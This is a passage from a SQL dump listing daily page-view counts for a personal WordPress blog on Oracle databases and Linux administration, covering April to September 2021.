(1353,'/','home','2021-04-27',50,0),
(1354,'/index.php/product/oracle_core_essential_internals_for_dbas_and_developers/','product','2021-04-27',1,323),
(1355,'/index.php/2020/02/02/rebuild-and-reorganize-all-indexes-within-a-database/','post','2021-04-27',2,66),
(1356,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-04-27',5,312),
(1357,'/','home','2021-04-28',20,0),
(1358,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-04-28',3,312),
(1359,'/index.php/about-me/','page','2021-04-28',1,51),
(1360,'/index.php/cart/','page','2021-04-28',2,320),
(1361,'/index.php/checkout/','page','2021-04-28',1,321),
(1362,'/index.php/my-account/','page','2021-04-28',1,322),
(1363,'/','home','2021-04-29',35,0),
(1364,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-04-29',5,312),
(1365,'/','home','2021-04-30',34,0),
(1366,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-04-30',4,312),
(1367,'/','home','2021-05-01',29,0),
(1368,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-05-01',6,312),
(1369,'/','home','2021-05-02',18,0),
(1370,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-05-02',3,312),
(1371,'/','home','2021-05-03',32,0),
(1372,'/index.php/about-me/','page','2021-05-03',1,51),
(1373,'/','home','2021-05-04',25,0),
(1374,'/index.php/cart/','page','2021-05-04',2,320),
(1375,'/index.php/about-me/','page','2021-05-04',1,51),
(1376,'/index.php/checkout/','page','2021-05-04',1,321),
(1377,'/index.php/my-account/','page','2021-05-04',1,322),
(1378,'/index.php/2020/02/02/impdp-errors-ora-02374-ora-12899/','post','2021-05-04',1,56),
(1379,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-05-04',1,312),
(1380,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-05-05',7,312),
(1381,'/','home','2021-05-05',26,0),
(1382,'/index.php/2020/02/02/impdp-errors-ora-02374-ora-12899/','post','2021-05-05',2,56),
(1383,'/index.php/2020/02/02/backup-restore-progress/','post','2021-05-05',2,64),
(1384,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2021-05-05',1,305),
(1385,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-05-06',6,312),
(1386,'/','home','2021-05-06',22,0),
(1387,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-05-06',3,150),
(1388,'/index.php/about-me/','page','2021-05-06',1,51),
(1389,'/index.php/2020/02/02/impdp-errors-ora-02374-ora-12899/','post','2021-05-06',1,56),
(1390,'/','home','2021-05-07',33,0),
(1391,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-05-07',4,97),
(1392,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-05-07',6,312),
(1393,'/index.php/about-me/','page','2021-05-07',1,51),
(1394,'/index.php/cart/','page','2021-05-07',2,320),
(1395,'/index.php/checkout/','page','2021-05-07',1,321),
(1396,'/index.php/my-account/','page','2021-05-07',1,322),
(1397,'/','home','2021-05-08',20,0),
(1398,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-05-08',4,97),
(1399,'/','home','2021-05-09',27,0),
(1400,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-05-09',2,312),
(1401,'/','home','2021-05-10',26,0),
(1402,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-05-10',2,150),
(1403,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-05-10',1,312),
(1404,'/','home','2021-05-11',31,0),
(1405,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-05-11',5,312),
(1406,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-05-11',4,150),
(1407,'/index.php/about-me/','page','2021-05-11',4,51),
(1408,'/index.php/cart/','page','2021-05-11',2,320),
(1409,'/index.php/checkout/','page','2021-05-11',1,321),
(1410,'/index.php/my-account/','page','2021-05-11',1,322),
(1411,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2021-05-11',2,110),
(1412,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2021-05-11',2,305),
(1413,'/index.php/2021/02/06/hosting-a-podcast/','post','2021-05-11',2,329),
(1414,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2021-05-11',1,68),
(1415,'/','home','2021-05-12',22,0),
(1416,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-05-12',5,312),
(1417,'/index.php/about-me/','page','2021-05-12',1,51),
(1418,'/index.php/cart/','page','2021-05-12',2,320),
(1419,'/index.php/checkout/','page','2021-05-12',1,321),
(1420,'/index.php/my-account/','page','2021-05-12',1,322),
(1421,'/index.php/2021/02/06/hosting-a-podcast/','post','2021-05-12',1,329),
(1422,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2021-05-12',1,305),
(1423,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-05-12',2,150),
(1424,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2021-05-12',1,110),
(1425,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-05-12',1,104),
(1426,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-05-12',1,97),
(1427,'/','home','2021-05-13',19,0),
(1428,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-05-13',5,97),
(1429,'/index.php/about-me/','page','2021-05-13',1,51),
(1430,'/index.php/cart/','page','2021-05-13',2,320),
(1431,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-05-13',1,312),
(1432,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-05-13',2,150),
(1433,'/','home','2021-05-14',29,0),
(1434,'/index.php/cart/','page','2021-05-14',2,320),
(1435,'/index.php/2021/02/06/hosting-a-podcast/','post','2021-05-14',1,329),
(1436,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-05-14',1,104),
(1437,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2021-05-14',1,110),
(1438,'/index.php/2020/02/02/backup-restore-progress/','post','2021-05-14',1,64),
(1439,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-05-14',3,312),
(1440,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-05-14',2,150),
(1441,'/index.php/about-me/','page','2021-05-14',1,51),
(1442,'/index.php/checkout/','page','2021-05-14',1,321),
(1443,'/index.php/2020/02/02/rebuild-and-reorganize-all-indexes-within-a-database/','post','2021-05-14',1,66),
(1444,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2021-05-14',1,68),
(1445,'/index.php/my-account/','page','2021-05-14',2,322),
(1446,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2021-05-14',1,305),
(1447,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-05-14',3,97),
(1448,'/index.php/product/oracle_core_essential_internals_for_dbas_and_developers/','product','2021-05-14',1,323),
(1449,'/index.php/2020/02/02/database-startup-error-fatal-ni-connect-error-12547/','post','2021-05-14',1,60),
(1450,'/index.php/2020/02/02/impdp-errors-ora-02374-ora-12899/','post','2021-05-14',1,56),
(1451,'/index.php/2020/02/02/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2021-05-14',1,27),
(1452,'/','home','2021-05-15',34,0),
(1453,'/index.php/about-me/','page','2021-05-15',1,51),
(1454,'/index.php/cart/','page','2021-05-15',1,320),
(1455,'/index.php/my-account/','page','2021-05-15',1,322),
(1456,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-05-15',3,312),
(1457,'/','home','2021-05-16',17,0),
(1458,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-05-16',1,97),
(1459,'/index.php/about-me/','page','2021-05-16',1,51),
(1460,'/index.php/cart/','page','2021-05-16',2,320),
(1461,'/index.php/checkout/','page','2021-05-16',1,321),
(1462,'/index.php/my-account/','page','2021-05-16',1,322),
(1463,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-05-16',3,312),
(1464,'/','home','2021-05-17',45,0),
(1465,'/index.php/about-me/','page','2021-05-17',1,51),
(1466,'/index.php/cart/','page','2021-05-17',2,320),
(1467,'/index.php/checkout/','page','2021-05-17',1,321),
(1468,'/index.php/my-account/','page','2021-05-17',1,322),
(1469,'/','home','2021-05-18',32,0),
(1470,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-05-18',2,97),
(1471,'/index.php/2020/02/02/impdp-errors-ora-02374-ora-12899/','post','2021-05-18',3,56),
(1472,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-05-18',4,312),
(1473,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2021-05-18',1,305),
(1474,'/index.php/2021/02/06/hosting-a-podcast/','post','2021-05-18',1,329),
(1475,'/','home','2021-05-19',21,0),
(1476,'/index.php/cart/','page','2021-05-19',1,320),
(1477,'/index.php/about-me/','page','2021-05-19',1,51),
(1478,'/index.php/2021/02/06/hosting-a-podcast/','post','2021-05-19',1,329),
(1479,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-05-19',2,312),
(1480,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2021-05-19',1,305),
(1481,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-05-19',1,150),
(1482,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2021-05-19',1,110),
(1483,'/','home','2021-05-20',26,0),
(1484,'/index.php/about-me/','page','2021-05-20',2,51),
(1485,'/index.php/cart/','page','2021-05-20',4,320),
(1486,'/index.php/checkout/','page','2021-05-20',2,321),
(1487,'/index.php/my-account/','page','2021-05-20',2,322),
(1488,'/index.php/2020/02/10/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-05-20',2,104),
(1489,'/index.php/2021/02/06/hosting-a-podcast/','post','2021-05-20',1,329),
(1490,'/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','post','2021-05-20',2,312),
(1491,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2021-05-20',1,305),
(1492,'/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-05-20',1,150),
(1493,'/index.php/2020/02/25/connection-encryption-in-oracle-database/','post','2021-05-20',1,110),
(1494,'/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-05-20',1,97),
(1495,'/index.php/2020/02/02/change-the-character-set-collation-of-a-table/','post','2021-05-20',1,68),
(1496,'/index.php/homepage_test/','page','2021-05-20',1,343),
(1515,'/','home','2021-05-21',45,365),
(1516,'/index.php/2020/03/31/how-to-make-apache-web-server-more-secure/','post','2021-05-21',4,305),
(1517,'/fedora-33-problem-with-broadcom-wifi-device/','post','2021-05-21',6,312),
(1518,'/how-to-make-apache-web-server-more-secure/','post','2021-05-22',2,305),
(1519,'/','home','2021-05-22',13,365),
(1520,'/about-me/','page','2021-05-22',2,51),
(1522,'/','home','2021-05-28',6,365),
(1523,'/fedora-33-problem-with-broadcom-wifi-device/','post','2021-05-28',1,312),
(1524,'/','home','2021-06-03',2,365),
(1525,'/','home','2021-06-05',1,365),
(1526,'/','home','2021-06-14',3,365),
(1527,'/rebuild-and-reorganize-all-indexes-within-a-database/','post','2021-06-14',2,66),
(1528,'/','home','2021-06-21',1,365),
(1529,'/how-to-make-apache-web-server-more-secure/','post','2021-06-26',1,305),
(1530,'/','home','2021-06-26',38,365),
(1531,'/','home','2021-06-27',32,365),
(1532,'/','home','2021-06-28',38,365),
(1533,'/','home','2021-06-29',45,365),
(1534,'/','home','2021-06-30',39,365),
(1535,'/fedora-33-problem-with-broadcom-wifi-device/','post','2021-06-30',1,312),
(1536,'/','home','2021-07-01',31,365),
(1537,'/impdp-errors-ora-02374-ora-12899/','post','2021-07-01',1,56),
(1538,'/about-me/','page','2021-07-01',1,51),
(1539,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-07-01',1,583),
(1540,'/','home','2021-07-02',23,365),
(1541,'/fedora-33-problem-with-broadcom-wifi-device/','post','2021-07-02',2,312),
(1542,'/','home','2021-07-03',39,365),
(1543,'/','home','2021-07-04',35,365),
(1544,'/about-me/','page','2021-07-04',1,51),
(1545,'/','home','2021-07-05',55,365),
(1546,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-07-05',1,150),
(1547,'/','home','2021-07-06',77,365),
(1548,'/about-me/','page','2021-07-06',2,51),
(1549,'/index.php?pubkey=bd610cefd287ace65b9ca639a3bd0c45&bvTime=1625617051&bvVersion=0.1&bvMethod=dummyping&sha1=true&sig=23b7b2c272801481c20530d3633c22309593e258','home','2021-07-07',47,365),
(1550,'/','home','2021-07-08',40,365),
(1551,'/fedora-33-problem-with-broadcom-wifi-device/','post','2021-07-08',1,312),
(1552,'/','home','2021-07-09',39,365),
(1553,'/about-me/','page','2021-07-09',1,51),
(1554,'/','home','2021-07-10',56,365),
(1555,'/about-me/','page','2021-07-10',1,51),
(1556,'/','home','2021-07-11',27,365),
(1557,'/','home','2021-07-12',28,365),
(1558,'/','home','2021-07-13',37,365),
(1559,'/','home','2021-07-14',43,365),
(1560,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-07-14',7,583),
(1561,'/about-me/','page','2021-07-14',1,51),
(1562,'/fedora-33-problem-with-broadcom-wifi-device/','post','2021-07-14',1,312),
(1563,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-07-14',1,97),
(1564,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-07-14',1,104),
(1565,'/how-to-make-apache-web-server-more-secure/','post','2021-07-14',1,305),
(1566,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-07-14',1,150),
(1567,'/backup-restore-progress/','post','2021-07-14',1,64),
(1568,'/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2021-07-14',1,27),
(1569,'/connection-encryption-in-oracle-database/','post','2021-07-14',1,110),
(1570,'/database-startup-error-fatal-ni-connect-error-12547/','post','2021-07-14',1,60),
(1571,'/change-the-character-set-collation-of-a-table/','post','2021-07-14',1,68),
(1572,'/rebuild-and-reorganize-all-indexes-within-a-database/','post','2021-07-14',1,66),
(1573,'/impdp-errors-ora-02374-ora-12899/','post','2021-07-14',1,56),
(1574,'/','home','2021-07-15',43,365),
(1575,'/about-me/','page','2021-07-15',2,51),
(1576,'/','home','2021-07-16',45,365),
(1577,'/','home','2021-07-17',27,365),
(1578,'/fedora-33-problem-with-broadcom-wifi-device/','post','2021-07-17',1,312),
(1579,'/','home','2021-07-18',45,365),
(1580,'/fedora-33-problem-with-broadcom-wifi-device/','post','2021-07-18',1,312),
(1581,'/about-me/','page','2021-07-18',1,51),
(1582,'/','home','2021-07-19',26,365),
(1583,'/','home','2021-07-20',27,365),
(1584,'/fedora-33-problem-with-broadcom-wifi-device/','post','2021-07-20',1,312),
(1585,'/','home','2021-07-21',50,365),
(1586,'/','home','2021-07-22',31,365),
(1587,'/about-me/','page','2021-07-22',1,51),
(1588,'/','home','2021-07-23',36,365),
(1589,'/about-me/','page','2021-07-23',1,51),
(1590,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-07-23',3,583),
(1591,'/','home','2021-07-24',30,365),
(1592,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-07-24',1,583),
(1593,'/','home','2021-07-25',31,365),
(1594,'/about-me/','page','2021-07-25',1,51),
(1595,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-07-25',1,583),
(1596,'/hosting-a-podcast/','post','2021-07-25',1,329),
(1597,'/fedora-33-problem-with-broadcom-wifi-device/','post','2021-07-25',1,312),
(1598,'/how-to-make-apache-web-server-more-secure/','post','2021-07-25',1,305),
(1599,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-07-25',1,150),
(1600,'/connection-encryption-in-oracle-database/','post','2021-07-25',1,110),
(1601,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-07-25',1,104),
(1602,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-07-25',1,97),
(1603,'/change-the-character-set-collation-of-a-table/','post','2021-07-25',1,68),
(1604,'/rebuild-and-reorganize-all-indexes-within-a-database/','post','2021-07-25',1,66),
(1605,'/','home','2021-07-26',28,365),
(1606,'/','home','2021-07-27',33,365),
(1607,'/','home','2021-07-28',33,365),
(1608,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-07-28',1,583),
(1609,'/','home','2021-07-29',41,365),
(1610,'/','home','2021-07-30',41,365),
(1611,'/','home','2021-07-31',41,365),
(1612,'/about-me/','page','2021-07-31',2,51),
(1613,'/','home','2021-08-01',37,365),
(1614,'/about-me/','page','2021-08-01',2,51),
(1615,'/','home','2021-08-02',33,365),
(1616,'/','home','2021-08-03',40,365),
(1617,'/fedora-33-problem-with-broadcom-wifi-device/','post','2021-08-04',2,312),
(1618,'/','home','2021-08-04',31,365),
(1619,'/','home','2021-08-05',36,365),
(1620,'/about-me/','page','2021-08-05',1,51),
(1621,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-08-05',1,583),
(1622,'/','home','2021-08-06',31,365),
(1623,'/about-me/','page','2021-08-06',1,51),
(1624,'/','home','2021-08-07',21,365),
(1625,'/','home','2021-08-08',36,365),
(1626,'/about-me/','page','2021-08-08',1,51),
(1627,'/','home','2021-08-09',26,365),
(1628,'/','home','2021-08-10',31,365),
(1629,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-08-10',1,583),
(1630,'/','home','2021-08-11',32,365),
(1631,'/about-me/','page','2021-08-11',1,51),
(1632,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-08-12',3,583),
(1633,'/','home','2021-08-12',41,365),
(1634,'/','home','2021-08-13',39,365),
(1635,'/about-me/','page','2021-08-13',3,51),
(1636,'/','home','2021-08-14',34,365),
(1637,'/about-me/','page','2021-08-14',1,51),
(1638,'/','home','2021-08-15',26,365),
(1639,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-08-15',2,583),
(1640,'/','home','2021-08-16',27,365),
(1641,'/fedora-33-problem-with-broadcom-wifi-device/','post','2021-08-16',1,312),
(1642,'/','home','2021-08-17',26,365),
(1643,'/','home','2021-08-18',39,365),
(1644,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-08-18',1,583),
(1645,'/about-me/','page','2021-08-18',1,51),
(1646,'/','home','2021-08-19',36,365),
(1647,'/fedora-33-problem-with-broadcom-wifi-device/','post','2021-08-19',2,312),
(1648,'/database-startup-error-fatal-ni-connect-error-12547/','post','2021-08-19',1,60),
(1649,'/about-me/','page','2021-08-19',1,51),
(1650,'/','home','2021-08-20',49,365),
(1651,'/about-me/','page','2021-08-20',1,51),
(1652,'/fedora-33-problem-with-broadcom-wifi-device/','post','2021-08-20',1,312),
(1653,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-08-20',7,583),
(1654,'/','home','2021-08-21',33,365),
(1655,'/about-me/','page','2021-08-21',1,51),
(1656,'/','home','2021-08-22',28,365),
(1657,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-08-22',1,583),
(1658,'/','home','2021-08-23',46,365),
(1659,'/connection-encryption-in-oracle-database/','post','2021-08-23',1,110),
(1660,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-08-23',4,583),
(1661,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-08-23',1,150),
(1662,'/about-me/','page','2021-08-23',1,51),
(1663,'/','home','2021-08-24',35,365),
(1664,'/about-me/','page','2021-08-24',1,51),
(1665,'/connection-encryption-in-oracle-database/','post','2021-08-24',1,110),
(1666,'/','home','2021-08-25',49,365),
(1667,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-08-25',1,583),
(1668,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-08-25',1,97),
(1669,'/','home','2021-08-26',46,365),
(1670,'/','home','2021-08-27',50,365),
(1671,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-08-27',2,104),
(1672,'/about-me/','page','2021-08-27',1,51),
(1673,'/how-to-make-apache-web-server-more-secure/','post','2021-08-27',1,305),
(1674,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-08-27',1,97),
(1675,'/fedora-33-problem-with-broadcom-wifi-device/','post','2021-08-27',1,312),
(1676,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-08-27',1,150),
(1677,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-08-27',1,583),
(1678,'/database-startup-error-fatal-ni-connect-error-12547/','post','2021-08-27',1,60),
(1679,'/change-the-character-set-collation-of-a-table/','post','2021-08-27',1,68),
(1680,'/backup-restore-progress/','post','2021-08-27',1,64),
(1681,'/rebuild-and-reorganize-all-indexes-within-a-database/','post','2021-08-27',1,66),
(1682,'/connection-encryption-in-oracle-database/','post','2021-08-27',1,110),
(1683,'/impdp-errors-ora-02374-ora-12899/','post','2021-08-27',1,56),
(1684,'/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2021-08-27',1,27),
(1685,'/hosting-a-podcast/','post','2021-08-27',1,329),
(1686,'/','home','2021-08-28',35,365),
(1687,'/about-me/','page','2021-08-28',1,51),
(1688,'/','home','2021-08-29',24,365),
(1689,'/','home','2021-08-30',23,365),
(1690,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-08-30',1,583),
(1691,'/','home','2021-08-31',40,365),
(1692,'/about-me/','page','2021-08-31',1,51),
(1693,'/','home','2021-09-01',38,365),
(1694,'/about-me/','page','2021-09-01',1,51),
(1695,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-09-01',1,97),
(1696,'/','home','2021-09-02',45,365),
(1697,'/','home','2021-09-03',35,365),
(1698,'/','home','2021-09-04',34,365),
(1699,'/connection-encryption-in-oracle-database/','post','2021-09-04',1,110),
(1700,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-09-04',2,104),
(1701,'/about-me/','page','2021-09-04',3,51),
(1702,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-09-04',2,97),
(1703,'/','home','2021-09-05',54,365),
(1704,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-09-05',1,97),
(1705,'/','home','2021-09-06',41,365),
(1706,'/about-me/','page','2021-09-06',1,51),
(1707,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-09-06',1,97),
(1708,'/','home','2021-09-07',43,365),
(1709,'/about-me/','page','2021-09-07',2,51),
(1710,'/','home','2021-09-08',35,365),
(1711,'/','home','2021-09-09',47,365),
(1712,'/about-me/','page','2021-09-09',1,51),
(1713,'/','home','2021-09-10',33,365),
(1714,'/impdp-errors-ora-02374-ora-12899/','post','2021-09-10',1,56),
(1715,'/','home','2021-09-11',31,365),
(1716,'/fedora-33-problem-with-broadcom-wifi-device/','post','2021-09-11',3,312),
(1717,'/','home','2021-09-12',37,365),
(1718,'/fedora-33-problem-with-broadcom-wifi-device/','post','2021-09-12',1,312),
(1719,'/about-me/','page','2021-09-12',1,51),
(1720,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-09-12',1,583),
(1721,'/','home','2021-09-13',50,365),
(1722,'/about-me/','page','2021-09-13',2,51),
(1723,'/fedora-33-problem-with-broadcom-wifi-device/','post','2021-09-13',1,312),
(1724,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-09-13',1,97),
(1725,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-09-13',1,104),
(1726,'/how-to-make-apache-web-server-more-secure/','post','2021-09-13',1,305),
(1727,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-09-13',3,150),
(1728,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-09-13',1,583),
(1729,'/backup-restore-progress/','post','2021-09-13',1,64),
(1730,'/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2021-09-13',1,27),
(1731,'/connection-encryption-in-oracle-database/','post','2021-09-13',1,110),
(1732,'/database-startup-error-fatal-ni-connect-error-12547/','post','2021-09-13',1,60),
(1733,'/change-the-character-set-collation-of-a-table/','post','2021-09-13',1,68),
(1734,'/rebuild-and-reorganize-all-indexes-within-a-database/','post','2021-09-13',1,66),
(1735,'/impdp-errors-ora-02374-ora-12899/','post','2021-09-13',1,56),
(1736,'/','home','2021-09-14',39,365),
(1737,'/about-me/','page','2021-09-14',1,51),
(1738,'/fedora-33-problem-with-broadcom-wifi-device/','post','2021-09-14',1,312),
(1739,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-09-14',1,97),
(1740,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-09-14',1,104),
(1741,'/how-to-make-apache-web-server-more-secure/','post','2021-09-14',1,305),
(1742,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-09-14',1,150),
(1743,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-09-14',1,583),
(1744,'/backup-restore-progress/','post','2021-09-14',1,64),
(1745,'/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2021-09-14',1,27),
(1746,'/connection-encryption-in-oracle-database/','post','2021-09-14',1,110),
(1747,'/database-startup-error-fatal-ni-connect-error-12547/','post','2021-09-14',1,60),
(1748,'/change-the-character-set-collation-of-a-table/','post','2021-09-14',1,68),
(1749,'/rebuild-and-reorganize-all-indexes-within-a-database/','post','2021-09-14',1,66),
(1750,'/impdp-errors-ora-02374-ora-12899/','post','2021-09-14',1,56),
(1751,'/','home','2021-09-15',34,365),
(1752,'/about-me/','page','2021-09-15',1,51),
(1753,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-09-15',1,583),
(1754,'/hosting-a-podcast/','post','2021-09-15',1,329),
(1755,'/fedora-33-problem-with-broadcom-wifi-device/','post','2021-09-15',1,312),
(1756,'/how-to-make-apache-web-server-more-secure/','post','2021-09-15',1,305),
(1757,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-09-15',1,150),
(1758,'/connection-encryption-in-oracle-database/','post','2021-09-15',1,110),
(1759,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-09-15',1,104),
(1760,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-09-15',1,97),
(1761,'/change-the-character-set-collation-of-a-table/','post','2021-09-15',1,68),
(1762,'/rebuild-and-reorganize-all-indexes-within-a-database/','post','2021-09-15',1,66),
(1763,'/','home','2021-09-16',37,365),
(1764,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-09-16',2,104),
(1765,'/about-me/','page','2021-09-16',8,51),
(1766,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','post','2021-09-16',3,583),
(1767,'/how-to-make-apache-web-server-more-secure/','post','2021-09-16',3,305),
(1768,'/connection-encryption-in-oracle-database/','post','2021-09-16',1,110),
(1769,'/add-new-disk-to-redhat-based-linux-without-reboot/','post','2021-09-16',1,97),
(1770,'/change-the-character-set-collation-of-a-table/','post','2021-09-16',1,68),
(1771,'/rebuild-and-reorganize-all-indexes-within-a-database/','post','2021-09-16',1,66),
(1772,'/backup-restore-progress/','post','2021-09-16',1,64),
(1773,'/database-startup-error-fatal-ni-connect-error-12547/','post','2021-09-16',1,60),
(1774,'/impdp-errors-ora-02374-ora-12899/','post','2021-09-16',1,56),
(1775,'/grid-infrastructure-oracle-database-12c-preinstallation-tasks/','post','2021-09-16',1,27),
(1776,'/fedora-33-problem-with-broadcom-wifi-device/','post','2021-09-16',1,312),
(1777,'/one-way-to-prevent-ddos-attacks-in-wordpress/','post','2021-09-16',1,150),
(1778,'/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/feed/','feed','2021-09-16',1,583),
(1779,'/hosting-a-podcast/','post','2021-09-16',1,329),
(1780,'/how-to-make-apache-web-server-more-secure/feed/','feed','2021-09-16',1,305),
(1781,'/','home','2021-09-17',31,365),
(1782,'/how-to-setup-a-loadbalancer-with-haproxy-in-redhat-7/','post','2021-09-17',1,104),
(1783,'/','home','2021-09-18',56,365),
